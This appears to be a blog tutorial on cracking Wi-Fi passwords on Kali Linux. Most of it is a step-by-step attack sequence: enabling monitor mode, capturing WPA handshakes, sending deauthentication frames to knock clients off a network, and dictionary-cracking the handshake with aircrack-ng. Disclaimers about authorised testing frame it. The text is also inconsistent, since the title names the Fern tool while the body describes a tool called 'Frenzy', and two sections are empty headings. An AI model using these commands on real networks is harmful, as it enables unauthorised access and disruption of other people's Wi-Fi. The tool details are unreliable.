← Back to All Articles

How to hack WiFi password with Fern kali Linux tool

By Cyberpritam Admin Team admin@cyberpritam.com Posted on 05 May 2025
Area of Article:
Cyber Security

Performing Wireless Attacks with Frenzy on Kali Linux – A Step-by-Step Guide


Disclaimer: This article is for educational purposes only. Do not attempt any wireless attack on networks you do not own or have explicit permission to test. Unauthorized access is illegal and unethical.


1. Introduction to Frenzy (Fren)


Frenzy, often referred to as Fren, is a lightweight wireless attack toolkit available in Kali Linux. It combines utilities to perform Wi-Fi monitoring, scanning, handshake capturing, and packet injection — particularly useful in WPA/WPA2 cracking scenarios.


2. Prerequisites



3. Installing or Verifying Frenzy


Option 1: From Kali's repositories


sudo apt update
sudo apt install frenzy

Option 2: From GitHub (if not in repo)


git clone https://github.com/xHak9x/frenzy.git
cd frenzy
chmod +x frenzy.sh

4. Setting Up Wireless Adapter


Step 1: Identify your wireless interface:


iwconfig

Step 2: Enable monitor mode:


sudo airmon-ng start wlan0

5. Launching Frenzy


sudo ./frenzy.sh

Navigate the menu using keyboard input. Choose scanning, attacks, or handshake capturing options as needed.


6. Using Frenzy for Wireless Attacks


WARNING: Only use on authorized networks!


A. Wi-Fi Scanning


Frenzy scans and lists all nearby Wi-Fi networks with details like BSSID, encryption, and channel.


B. Capture WPA Handshake


airodump-ng --bssid [BSSID] -c [Channel] -w handshake wlan0mon

C. Deauthentication Attack


aireplay-ng --deauth 10 -a [BSSID] wlan0mon

D. Crack the Handshake


aircrack-ng -w rockyou.txt -b [BSSID] handshake.cap

7. Additional Features



8. Logs and Output


Frenzy saves logs and handshakes in its working directory. Check with:


ls -lh

9. Stopping Monitor Mode


sudo airmon-ng stop wlan0mon
sudo service NetworkManager restart

10. Final Thoughts


Frenzy is a powerful tool for ethical hacking and penetration testing. Ensure you operate within the boundaries of the law and professional ethics.


References